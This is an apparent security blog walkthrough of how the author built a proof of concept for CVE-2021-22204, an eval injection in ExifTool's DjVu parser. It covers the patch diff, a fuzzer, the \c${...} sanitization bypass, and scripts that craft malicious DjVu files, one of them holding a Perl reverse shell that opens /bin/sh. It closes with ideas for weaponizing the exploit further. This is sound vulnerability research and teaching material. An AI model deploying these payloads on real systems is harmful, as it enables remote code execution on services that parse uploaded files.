From Fix to Exploit: Arbitrary Code Execution for CVE-2021-22204 in ExifTool

CYBERSECURITY / 06.15.21 / Michael Zandi

This is a narrative walkthrough of how I (like many others) independently built a Proof of Concept (PoC) for CVE-2021-22204. It includes the dead ends I hit and my thought process along the way. Most of this was done before other PoCs and writeups were published, but once I became aware of them, I happily took inspiration from them.

Background

ExifTool is a Perl library and Command Line Interface (CLI) application for reading, writing, and editing metadata in a variety of image and document formats. For example, it can be used to remove identifying metadata from JPG images. It’s used by GitLab (which is how this issue was originally discovered) and likely by many other web applications.

Here’s a snippet from the CVE-2021-22204 tracking page in NIST’s National Vulnerability Database (NVD):

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image.

Additionally, a referenced email on the OSS-security mailing list says:

The bug can be triggered from a wide variety of valid file formats.

Interesting! We have arbitrary code execution in a library that may be widely used and that is reachable from many different kinds of input. One could imagine the danger this poses for a web application that accepts user-uploaded images or documents.

Let’s see if we can figure out what’s going on here.

Initial Investigation

The vulnerability report for CVE-2021-22204 links to a GitHub diff for the fixed version of ExifTool. Reading the diff (or other online commentary), we find the following change in the ParseAnt function of the DjVu Perl module, which parses DjVu annotation fields:



-            # must protect unescaped "$" and "@" symbols, and "\" at end of string
-            $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
-            # convert C escape sequences (allowed in quoted text)
-            $tok = eval qq{"$tok"};
+            # convert C escape sequences, allowed in quoted text
+            # (note: this only converts a few of them!)
+            my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
+                        r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
+            $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;

This code is part of the case in ParseAnt that handles text wrapped in double-quote (") characters. So, if an annotation was asdf(hjkl"1234", this function would handle the string as 1234. There is recursion on the ( character as well as other handling, but this doesn’t seem to be part of the vulnerability.

Looking at the diff, we see that the old version did a search and replace on $tok to sanitize it, then ran an eval on $tok to implement handling of certain escapes like \n. However, the new version uses a search and replace to handle only the intended C escapes, and removes the eval entirely. From the vulnerability classification of incomplete sanitization, and the eval being removed, we can tell that we’ll want to focus on getting code execution here.

At its core, eval is very risky to use on uncontrolled input like this, so any code using an eval like this should be thoroughly audited, or better yet refactored to not require an eval at all.
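
To make the contrast concrete, here is a minimal sketch that lifts the lookup table from the patched code into a standalone helper. The wrapper name convert_escapes is my own invention for illustration; only the table and the substitution come from the diff.

```perl
use strict;
use warnings;

# Lookup table copied from the patched ParseAnt.
my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
            r => "\r", t => "\t", '"' => '"', '\\' => '\\' );

# convert_escapes is a hypothetical wrapper name, not part of ExifTool.
sub convert_escapes {
    my ($tok) = @_;
    # Known escapes come from the table; anything else keeps its backslash.
    $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;
    return $tok;
}

my $plain = convert_escapes('line1\nline2');    # backslash-n becomes a newline
my $inert = convert_escapes('\c${exit(42)}');   # stays literal text

print $plain eq "line1\nline2"  ? "newline converted\n"  : "unexpected\n";
print $inert eq '\c${exit(42)}' ? "payload left inert\n" : "unexpected\n";
```

Because nothing is ever handed to eval, an unknown escape such as \c simply passes through as text.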

Examining the Idiosyncrasies of Regex and Eval

Perl syntax and regexes can get a bit ugly. Here’s an annotated breakdown of the old substitution (spread out for reading, so it is not valid Perl as written):



$tok =~ # apply search/replace regex to $tok, saving modified version in $tok
 s # search/replace regex
     # syntax: s/match pattern/replace pattern/modifiers
     # (can use {} as pattern delimiters instead of / if we want)
 
 { \\(.) | ( [\$\@] | \\$ ) } # what to match, and capture groups in parentheses (if match, save input found in parentheses)
     # match any single character which is preceded by a '\', saving that character in capture group 1 OR
     # capture the following match in capture group 2:
     #    a '$' character OR
     #    a '@' character OR
     #    a '\' character at the end of the line (or before a trailing newline, thanks Jakub!)
 
 { '\\'.($2 || $1) } # what to replace each match with
     # IF there is a match THEN replace the matching text with
     # a '\' character followed by:
     #    capture group 2 if it exists ($ character, @ character, or '\' at end of line) OR
     #    capture group 1 (any character that was escaped by a '\')
     # (because of the matching regex, one of these must exist)
     
 sge; # modifiers
     # s: treat entire input as single line (so . also matches newlines)
     # g: replace every occurrence in the input, not just the first
     # e: evaluate the replacement as Perl code rather than as a plain string
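
To check the breakdown against real behavior, the substitution can be run on a few harmless inputs. This is only a sketch: the wrapper name sanitize and the sample strings are my own, while the regex is the one from the vulnerable code.

```perl
use strict;
use warnings;

# sanitize is a hypothetical wrapper around the pre-patch substitution.
sub sanitize {
    my ($tok) = @_;
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
    return $tok;
}

# Single-quoted literals keep their backslashes exactly as typed
# (the last one ends in a single backslash).
for my $in ('cost: $5', 'user@host', 'tab\there', 'trailing\\') {
    printf "%-12s -> %s\n", $in, sanitize($in);
}
```

Bare $ and @ gain a backslash, an already-escaped character is left alone, and a lone trailing backslash is doubled.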

We should also point out the for (;;) loop that precedes this regex. It handles some " and \ characters, which matters for sanitization:



for (;;) {
    # get string up to the next quotation mark
    # this doesn't work in perl 5.6.2! grrrr
    # last Tok unless $$dataPt =~ /(.*?)"/sg;
    # $tok .= $1;
    my $pos = pos($$dataPt);
    last Tok unless $$dataPt =~ /"/sg;
    $tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
    # we're good unless quote was escaped by odd number of backslashes
    last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
    $tok .= '"';    # quote is part of the string
}

This section is unchanged in the patch, but still influences how input is parsed. Basically, it grabs the rest of the input string up to the next " that is not escaped. This is important because of how the eval is structured:



$tok = eval qq{"$tok"};

In Perl, string interpolation is done on strings within " characters, but not on strings within ' characters. So "my $string" would have the contents of $string inserted into it, while 'my $string' would not. To make it easier to include " in interpolated strings, you can use qq{ … }. This eval takes $tok, wraps it in " to make it a string literal, and evaluates that literal. This poses a code-injection risk if $tok contains ", $, or @, so the code tries to neutralize those ahead of time.
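
For readers less familiar with Perl quoting, here is a small standalone sketch of the behaviors described above. The variable names are arbitrary; the last line uses the common @{[ ... ]} idiom to show that interpolation can run arbitrary code, which is why $ and @ matter so much here.

```perl
use strict;
use warnings;

my $name = 'world';

my $double = "hello $name";            # double quotes interpolate
my $single = 'hello $name';            # single quotes do not
my $quoted = qq{say "hello $name"};    # qq{} interpolates and allows a bare "
my $code   = "6 * 7 = @{[ 6 * 7 ]}";   # @{[ ... ]} evaluates code inside a string

print "$_\n" for $double, $single, $quoted, $code;
```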

In short, this sanitization (nearly) makes sure that before we eval:

All $ characters are escaped.
All @ characters are escaped.
There are no unescaped " characters that could break out of qq{"$tok"}.
All other escaped characters, like \n or \t, are preserved.

While this might seem strict, there’s clearly still a gap here. Otherwise, there wouldn’t be a vulnerability.
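
The quote handling behind the third guarantee can be exercised on its own. The sketch below is a standalone copy of the for (;;) loop under a hypothetical name, read_quoted, and it assumes the match position already sits just after the opening quote.

```perl
use strict;
use warnings;

# read_quoted is a hypothetical standalone version of the for (;;) loop.
# It expects pos($$dataPt) to point just past the opening quote.
sub read_quoted {
    my ($dataPt) = @_;
    my $tok = '';
    for (;;) {
        my $pos = pos($$dataPt);
        return undef unless $$dataPt =~ /"/sg;
        $tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
        # stop unless the quote was escaped by an odd number of backslashes
        last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
        $tok .= '"';    # escaped quote is part of the string
    }
    return $tok;
}

my $data = 'say \"hi\" now" trailing';
pos($data) = 0;
my $tok = read_quoted(\$data);
print "$tok\n";
```

The two escaped quotes are kept inside the token, and scanning stops at the first quote that has no backslash in front of it.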

Dead Ends and Misc. Tricks

There were many different things I tried before hitting on a functioning bypass of the sanitization. In this section, we’ll go through them and whether they were effective. I recommend following along by reading the most recent vulnerable version of the function here. This took me most of a week to work through.

First, I copied the vulnerable function into my own Perl script, so I could test against just the vulnerable code without worrying about the rest of ExifTool. This was useful for analyzing and understanding the root cause of the vulnerability. Using this test script, I tried the following things:

Manually trying different escape sequences

Because of the eval, far more escape sequences are processed than intended. For example, \x41 would produce an A character, and less well-known escapes like \U work as well. \c is one I didn’t previously know about, that handles “control” escape sequences. For example, \ch operates like Ctrl+h in a terminal, deleting the previous character. I tested and could verify that this affected our $tok string, but I couldn’t figure out how to use this to sneak any special characters past the sanitizing.

This `\c` escape ends up being the key, which wasn’t clear to me until later.
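
A quick way to see how much the eval accepts is to isolate that one step. In this sketch, expand is a hypothetical helper containing only the eval from the vulnerable code, fed a few harmless escapes.

```perl
use strict;
use warnings;

# expand is a hypothetical helper that mirrors only the vulnerable eval step.
# Never call something like this on untrusted input.
sub expand {
    my ($tok) = @_;
    return eval qq{"$tok"};
}

printf "%s\n", expand('\x41');        # hex escape
printf "%s\n", expand('\Ushout');     # \U upper-cases what follows
printf "%d\n", ord(expand('\ch'));    # control escape: code of the backspace character
```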

String interpolation without $ or @

I wasn’t able to find any interpolation syntax that didn’t require $ or @. Something like ${ …code… } seemed like our best bet at getting code execution. I was hoping something like backticks would work, but no luck.

Tricking it with ( recursion to combine two benign strings into an evil string

Even using ( to recurse, the eval only happens at the base case of strings within " characters, not on combined results from recursively called functions.

Perl -T taint tracking

Perl supports rudimentary taint tracking with -T, which sounds promising both as a security control and as a way to analyze this bug. As the Perl security documentation (perlsec) puts it:

You may not use data derived from outside your program to affect something else outside your program—at least, not by accident.

But running our test program with -T, all we really get is a warning that the eval is operating on tainted memory, which we already know. I was hoping that this feature would do some kind of analysis on the sanitization regex for me, but it’s a much simpler feature than that.

Perl regex debugging

Maybe I just don’t understand the regex well enough? We can debug the regex to see detailed info regarding how the state machine is compiled and processes input looking for matches. We can use -Mre=debug to enable this for an entire script, but this also debugs regexes we aren’t interested in. Instead, we can wrap just our regex of interest with use re 'debug'; before and no re 'debug'; after to debug only the code we’re interested in.

This does help us observe the regex as it runs on our input. However, it didn’t really help me find any magic characters that snuck past the regex match, or anything else that proved useful.
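
As a sketch of the scoped approach, the pragma can also be confined with a bare block instead of a matching no re 'debug'; line, since use re 'debug' is lexically scoped. The sample input is arbitrary, and the trace goes to standard error.

```perl
use strict;
use warnings;

my $tok = 'a$b';
{
    use re 'debug';   # only regexes inside this block are traced
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
}
# Regexes out here run without debug output.
print "result: $tok\n";
```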

Fuzzing with raw ASCII/bytes

At this point, I felt pretty well stumped. I figured I’d just throw bytes and ASCII at it until I got something promising. Generating random bytes is easy enough, and generating ASCII isn’t much harder. It’s also easy to add in extra logic like “for ASCII characters, with a chance of 25% escape the ASCII character” or “have a 50% chance of generating a special character” to help generate strings that might be more interesting.

To fuzz properly we need to be able to replicate any findings. Saving all of the inputs we try is infeasible, so we start our script with a call like print("seed: ", srand(), "\n"); since srand() returns the seed it used (in Perl 5.14 and later). Once we know the seed of a particular run, we can always replicate it by reusing the same seed, as long as we don’t change anything in how we use rand(). We also want to trim down on print statements and leave out use warnings;. This way we can log interesting output on findings and performance using perl ./fuzz.pl &> fuzz_log.txt without bloating our output too much.

This is where using Git to track changes would be especially useful, since the seed used for a run is useless without the exact code executed in that run.
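
The replay property is easy to demonstrate in isolation. This is a minimal sketch with a hypothetical generator, random_input, that is much simpler than the real fuzzer: seeding with the same value yields the same "random" input.

```perl
use strict;
use warnings;

# random_input is a hypothetical generator: printable ASCII from a given seed.
sub random_input {
    my ($seed, $length) = @_;
    srand($seed);
    return join '', map { chr(0x20 + int(rand(0x5f))) } 1 .. $length;
}

my $first  = random_input(12345, 16);
my $second = random_input(12345, 16);
print $first eq $second ? "same seed, same input\n" : "mismatch\n";
```

The guarantee only holds while the sequence of rand() calls stays identical, which is why the exact code of each run matters.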

On its own, this didn’t really get anywhere, but it was very helpful later.

Differential fuzzing the vuln/fixed versions with Data::Compare

Since there was a change in the ParseAnt function, maybe we can compare how the vulnerable version behaves differently from the fixed one, to help us find what sort of input can lead to code execution? Let’s copy and paste the fixed function into our code as well. Then, we feed the same input to both versions of ParseAnt, and compare the resulting data structures using the Data::Compare module from CPAN. We can also use the built-in Data::Dumper to print the data structures in a human-readable way.

Unfortunately, there are enough differences in how escapes are handled that we have a large number of inputs that produce different data structures. So, we don’t really learn anything from this.
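
Here is a reduced sketch of why the comparison is so noisy. It compares only the escape-conversion step rather than the full ParseAnt, and it swaps Data::Compare for a plain string comparison of Data::Dumper output so that it runs with core modules only. The names old_convert and new_convert are hypothetical.

```perl
use strict;
use warnings;
use Data::Dumper;

$Data::Dumper::Useqq = 1;   # show control characters as escapes
$Data::Dumper::Terse = 1;   # no "$VAR1 =" prefix

# Pre-patch conversion: sanitize, then eval (never feed this untrusted data).
sub old_convert {
    my ($tok) = @_;
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
    return eval qq{"$tok"};
}

# Post-patch conversion: table lookup only.
my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
            r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
sub new_convert {
    my ($tok) = @_;
    $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;
    return $tok;
}

for my $in ('a\nb', '\x41', '\101') {
    my ($old, $new) = (Dumper(old_convert($in)), Dumper(new_convert($in)));
    chomp($old, $new);
    printf "%-6s old=%s new=%s %s\n", $in, $old, $new,
        $old eq $new ? 'same' : 'DIFFERENT';
}
```

Perfectly harmless inputs like \x41 already differ between the two versions, so a mismatch alone says nothing about code execution.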

The Solution

I got sick of the lack of progress hammering on ParseAnt. It seemed clear that there must be some way to get code to execute in the eval, but the only way I knew to do that required $ or @ characters, which seemed likely to be rigorously escaped. It seemed that " characters were also handled properly. There must be some magic input to un-escape that escaping, but I was out of ideas.

At this point, I broke the problem down into simpler ones, like “Can we get code execution with just the regex and the eval?” After manual experimentation, I determined that this was possible:



sub just_regex_eval($) {
    my $tok = shift;
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
    # convert C escape sequences (allowed in quoted text)
    print("eval: ",join('',("\"",$tok,"\"")), "\n");
    $tok = eval qq{"$tok"};
}
my $tmp = <<'EOF';
";exit(41);"
EOF
just_regex_eval($tmp);

$ perl ./just_regex.pl
main::ParseAnt() called too early to check prototype at ./just_regex.pl line 24.
eval: "";exit(41);"
"
Useless use of a constant ("") in void context at (eval 34) line 1.
$ echo $?
41

OK, that’s not too bad. We can just use " to end the string and have our code executed directly. But if we use this against the full ParseAnt function, it breaks:



$ perl ./test_regex.pl 
main::ParseAnt() called too early to check prototype at ./test_regex.pl line 24.
eval: ";exit(41);"
XXX token after: ;exit(41);
$ echo $?
0

Using " is all we need to do to get to our vulnerable code, so the only thing we added that could be breaking our simple exploit is the for (;;) loop handling " characters. Instead of manually trying the full problem again, I figured I’d reuse my fuzzer components from earlier, but with minor modifications.

This kind of sanitizing seems like it could be bypassed with a few of the right characters in the right places, which should be findable by brute force. If I find the right characters to add to the beginning and end of my payload, it will eventually execute. The payload exits the fuzzer with a special exit code, so I know I struck gold rather than having crashed for some other reason.

Here’s the full source of my ‘lightweight’ fuzzer that wound up working, bizarre comments and all:



use strict;
#use warnings; # too much irrelevant output

use Data::Compare;
use Data::Dumper;

sub process_regex($)
{
	my $dataPt = shift;
	#pos($dataPt) = 0;

    return undef unless $$dataPt =~ /(\S)/sg;   # get next non-space character

	#my $tok = $$dataPt;
	my $tok = "";
	for (;;) {
		# get string up to the next quotation mark
		# this doesn't work in perl 5.6.2! grrrr
		# last Tok unless $$dataPt =~ /(.*?)"/sg;
		# $tok .= $1;

		my $pos = pos($$dataPt);
		return undef unless $$dataPt =~ /"/sg;
		$tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
		# we're good unless quote was escaped by odd number of backslashes

		last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
		$tok .= '"';    # quote is part of the string
	}

	# XXX: vulnerability here. We can get code execution in this eval
	# must protect unescaped "$" and "@" symbols, and "\" at end of string
	#use re 'debug';
	$tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
	#no re 'debug';
	# convert C escape sequences (allowed in quoted text)
	#print("eval: ",join('',("\"",$tok,"\"")), "\n");
	$tok = eval qq{"$tok"};
	print("[CRASH] error: ", @_) if @_; # Actually I misread documentation; should have used $@. Oops!

	return $tok;
}

# uniform random byte
sub rand_byte() {
	my $byte = int(rand(256));
	return chr($byte); # convert from int to character (byte)
}

# get a valid printable ASCII character (0x20-0x7e)
sub rand_ascii() {
	my $val = int(rand(0x7e - 0x20) + 0x20);
	return chr($val);
}

# Inputs:
# 0) length of request in bytes. May be larger due to escapes.
# 1) give raw bytes. If true, just throw bytes at us. If false, stick to printable ASCII
sub generate_string($$)
{
	my ($length, $raw_bytes) = @_;
	my $res = "";

	for (my $i=0; $i < $length; $i++) {
		if ($raw_bytes) {
			# actually let's just be dumb and only do bytes and see what happens
			# 1/4 chance of escaping this byte, just because that's 'interesting'
			if (int(rand(4)) == 0) {
				$res .= "\\";
			}
			$res .= rand_byte();
		} else {
			# printable ASCII
			my $v = rand_ascii();
			if(int(rand(4)) == 0) {
				# randomly escape some characters
				$res .= "\\";
			}
			if (int(rand(8)) == 0) {
				# randomly double some characters
				$res .= $v;
			}
			$res .= $v;
		}
	}
	
	return $res;
}

sub fuzz() {
	# the plain regex, without any handling of quotes, is exploitable by this: "\";print('asdf');\"";

	my $print_inputs = 0;

	# will execute in the easier version without quote handling, if wrap with "
	my $input = <<'HERE';
;exit(42);;
HERE
	$input =~ s/\s+$//;

	# idea: put random things before/after a `print('asdf')` and check output for 'asdf'
	# If we see it, we know we hit gold!

	$| = 1; # set stdout to autoflush (output properly synchronized with stderr)
	my $seed = srand(3587231692); # got execution with 3587231692 after ~1 hr
	print("[FUZZER] fuzzing with seed $seed\n");
	my $last_i = 0;
	my $last_timestamp = time();
	my $timestamp_start = $last_timestamp;

	# b >= a
	my $execspeed_a = 0;
	my $execspeed_b = 0;
	my $execspeed = 0;
	for (my $i = 0;; $i++) {
		# XXX generate input here!
		my $pre = generate_string(int(rand(6)), undef);
		my $post = generate_string(int(rand(6)), undef);

		my $data = join('',($pre, $input,$post));
		$data = join('',("\"",$data,"\"")); # only with extra " handling

		if ($i - $last_i >= 1000) {
			my $timestamp = time();
			if ($timestamp > $last_timestamp) {
				$execspeed_a = $execspeed_b;
				$execspeed_b = $i;
				$execspeed = $execspeed_b - $execspeed_a;
				$last_timestamp = $timestamp;
				print("[FUZZER] heartbeat $timestamp: ~$execspeed exec/s\n");

				# don't print a massive file until we're just about to strike gold
				if ($timestamp - $timestamp_start >= 4270) {
					$print_inputs = 1;
				}
			}
			$last_i = $i;
		}

		# XXX call vulnerable code here!
		#print("[FUZZER] input: $data\n");
		# let's try differential testing
		print(join('',("trying input: ", $data, "\n"))) if $print_inputs;
		my $res = process_regex(\$data);
	}
}

fuzz();

Running it and coming back after dinner, we see that it successfully finished. Lucky us!



$ perl ./fuzz_light.pl &> fuzz_log.txt
$ echo $?
42

Checking our log, we see a lot of interesting output before the magic combination that gets our code properly executing. If we hadn’t obtained the complete answer, these errors and warnings would still point us toward a functioning exploit:



...
[FUZZER] heartbeat 1620435137: ~76000 exec/s
Variable "@a" is not imported at (eval 956645) line 1.
[FUZZER] heartbeat 1620435138: ~77000 exec/s
...
trying input: "\R\c\@y;exit(42);;2"
Variable "@y" is not imported at (eval 334017354) line 1.

Interesting! It looks like \c\@y gets turned into @y and interpreted by the eval as a variable that doesn’t exist. At the end of our log, we find the gold nugget input that was properly executed, which used the same trick: "\%2\c${;exit(42);;*\}C]", or after we simplify it, "\c${exit(42)}".

It was at this moment that I realized I had read about this exact thing in the perlop documentation five days earlier. I had been using this to puzzle out the more obscure parts of Perl string interpolation:

Also, \c\X yields chr(28) . "X" for any X

Luckily chr(28), the “file separator” character in ASCII, doesn’t seem to cause problems with Perl’s string interpolation. What a useful coincidence! \c\$ already looks escaped to the regex, so it passes through untouched, but the eval reads \c\ as chr(28) and leaves a bare $ behind. Likewise, the regex turns \c$ into \c\$, which ends up as a bare $ in the same way. We can now sneak our magic interpolation characters into our eval and execute code.
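
The whole bypass fits in a few lines. This sketch isolates the substitution and eval under a hypothetical name, vulnerable_convert, and uses a benign stand-in payload that computes 6*7 through @{[ ... ]} instead of calling exit().

```perl
use strict;
use warnings;

# Same substitution and eval as the vulnerable code, isolated for study.
# vulnerable_convert is a hypothetical name; never run it on untrusted input.
sub vulnerable_convert {
    my ($tok) = @_;
    $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
    print "sanitized: $tok\n";
    return eval qq{"$tok"};
}

# Benign stand-in payload: compute 6*7 instead of calling exit().
my $out = vulnerable_convert('\c@{[ 6*7 ]}');

printf "bytes: %s\n", join ' ', map { ord($_) } split //, $out;
```

The sanitized token still shows \@, yet the result begins with byte 28 followed by the digits of 42, meaning the code inside the braces ran.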

Fuzzer Improvements in Hindsight

Here are some ideas I had after the fuzzer worked, regarding how it could have found a working input faster:

Chance to Nest Input
Have some chance to generate matching nesting characters in prepended/appended generated strings. If { appears in a prepended string, have a chance to put } in an appended string.
More Intelligent Escaping
Instead of randomly escaping any ASCII character with only \, have chances to escape with \c, \x, and other escapes that take parameters.
Smarter Random Number Generator (RNG) State Management
Periodically dump RNG state to a file to reduce overhead if we want to replicate part of a run. This way, instead of only being able to restart from the beginning, we can restart shortly before we find an interesting input.
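
As an illustration of the “More Intelligent Escaping” idea, here is one possible sketch. The generator name rand_escape, the four-way split, and the probabilities are all assumptions of mine; none of this was part of the fuzzer that found the bug.

```perl
use strict;
use warnings;

# rand_escape is a hypothetical generator: besides a bare backslash, it
# sometimes emits \c and \x escapes, which take an argument.
sub rand_escape {
    my $ch   = chr(0x20 + int(rand(0x5f)));   # printable ASCII argument
    my $kind = int(rand(4));
    return "\\$ch"                            if $kind == 0;  # plain \X
    return "\\c$ch"                           if $kind == 1;  # control escape
    return sprintf("\\x%02x", int(rand(256))) if $kind == 2;  # hex escape
    return $ch;                                               # unescaped
}

srand(1);   # fixed seed so a run can be replayed
print join('', map { rand_escape() } 1 .. 8), "\n";
```

With \c in the mix, a sequence like \c followed by $ or @ becomes far more likely to show up than with uniformly random characters.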

Making a DjVu File

All that’s left to do now is to wrap this payload in a DjVu file so that it will get processed correctly. I initially tried this with tools like djvused to manually set annotations, but I couldn’t preserve the escaping I needed. It seemed that djvused was escaping characters in my string before placing it in the file. This must be why ExifTool is handling C-style escapes in the first place. It also never seemed to create uncompressed ANTa chunks, only compressed ANTz chunks, so simple hex-editing wouldn’t be easy either.

Sure enough, going through the source of djvulibre and how it saves annotations, the contents are passed through a make_c_string function that appears to escape certain characters. Because using djvused seemed easy, I thought I’d just build a custom libdjvulibre.so without the escaping and use my modified version with LD_LIBRARY_PATH.

At this point I became aware of the first public PoCs and write-ups. I found that Jakub Wilk's PoC was much simpler, and a better starting point for my own PoC.

Here’s the quick and dirty PoC I wound up with, using Jakub’s much simpler method of creating a DjVu file, with the \c bypass I found:



$ cat my_poc.sh 
#!/bin/bash
# let's use jakub's technique to build the file, but use \c
printf 'P1 1 1 0' > mine.pbm
cjb2 mine.pbm mine.djvu
# fuzzer find: "\%2\c${;exit(42);;*\}C]"
printf 'ANTa\0\0\0\40(xmp "\c${exit(42)};#          "' >> mine.djvu
echo "created malicious mine.djvu"

Indeed, this works against ExifTool 12.23:



$ perl exiftool/exiftool mine.djvu &> /dev/null
$ echo $?
42
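
The \0\0\0\40 in the script is the chunk’s 4-byte big-endian length field: octal 40 is 32, which is exactly the length of the annotation text that follows, so the run of spaces appears to pad the text to that hard-coded size. A hedged sketch of computing the header instead of hard-coding it follows; anta_chunk is a hypothetical helper name, and the layout is inferred from the printf call above.

```perl
use strict;
use warnings;

# anta_chunk is a hypothetical helper: 4-byte chunk ID, 4-byte big-endian
# length, then the annotation text, matching what the printf call writes.
sub anta_chunk {
    my ($annotation) = @_;
    return 'ANTa' . pack('N', length($annotation)) . $annotation;
}

# Same annotation as in my_poc.sh, with the ten padding spaces spelled out.
my $annotation = '(xmp "\c${exit(42)};#' . (' ' x 10) . '"';
my $chunk      = anta_chunk($annotation);

printf "annotation length: %d (octal %o)\n",
    length($annotation), length($annotation);
printf "header bytes: %s\n",
    join ' ', map { sprintf '%02x', ord($_) } split //, substr($chunk, 0, 8);
```

Computing the length this way removes the need for padding when the payload changes.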

We can get a more exciting PoC working by taking a Perl reverse shell and manually replacing its variables with their values. This is necessary because any $ inside the ${ … } block is still escaped by the regex, and our \c trick can’t undo that there: the contents of the block are parsed as code rather than as an interpolated string.



#!/bin/bash
printf 'P1 1 1 0' > revshell.pbm
cjb2 revshell.pbm revshell.djvu
printf 'ANTa\0\0\0\xd3' >> revshell.djvu
cat <<'EOF' >> revshell.djvu
(xmp "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(1337,inet_aton('localhost')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};#"
EOF
echo "created malicious revshell.djvu"

Extra Credit

Here are some thoughts I had on weaponizing this PoC further, but I didn’t try any of these.

Automate transforming Perl payloads to be suitable for use within \c${ … }.
Apply obfuscation/perlgolf tricks to make analysis even more annoying.
Fork in the payload to avoid hanging the victim process.
Build tooling to automate creating malicious DjVu files.
Analyze ExifTool to determine what other code paths reach the vulnerable code from more common file formats like JPG or PDF.

Other PoCs and Writeups

Here is the writeup from the original discoverer of the vulnerability. The writeup details how they found it, their thought process at each step, and how they found multiple ways to exploit the vulnerability from different file formats.
Here’s a much simpler PoC by Jakub Wilk, the first public PoC I’m aware of. Short, sweet and to the point, it uses \n to escape sanitizing rather than \c.
This writeup on bricked.tech also uses a fuzzer to find a sanitization bypass, using Python. It finds the \n handling like Jakub’s PoC does, rather than \c handling. It’s also shorter and simpler than this writeup.
Here is a (now merged) pull request for Metasploit to add an exploit for this CVE, apparently using the \c trick rather than \n, and with other file formats like JPG.


About Michael Zandi

Software Engineer Associate of Applied Research at BlackBerry.
